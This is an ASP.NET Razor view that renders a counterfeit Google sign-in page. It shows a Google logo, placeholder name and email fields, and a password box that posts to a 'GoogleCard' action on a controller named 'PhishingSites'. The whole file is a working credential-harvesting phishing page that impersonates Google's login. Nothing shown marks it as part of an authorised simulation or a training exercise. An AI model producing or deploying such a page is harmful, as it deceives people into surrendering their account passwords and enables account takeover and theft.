@{
    Layout = null;
}

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google Form</title>
    <link rel="stylesheet" href="~/css/google.css">
</head>
<body>
 
<div class="box">
    <div class="logo">
        <img src="~/images/Untitled.png" id="google-img" alt="google"/>
    </div>
    <h2>{USER NAME}</h2>
    <p>{EMAİL}</p>
    @using (Html.BeginForm("GoogleCard", "PhishingSites", FormMethod.Post))
    {
        <div class="inputBox">
            <input type="text" name="text" required onkeyup="this.setAttribute('value', this.value);" value="">
            <label>Enter your password</label>
        </div>
        <div style="margin-top: 0.5rem ; margin-bottom: 2rem">
            <input id="show-psw" name="show-psw" type="checkbox"/>
            <label for="show-psw" id="lbl-show-psw">Show password</label>
        </div>
        <input type="submit" name="sign-in" value="Sign In" >
    }
</div>
     
</body>
</html>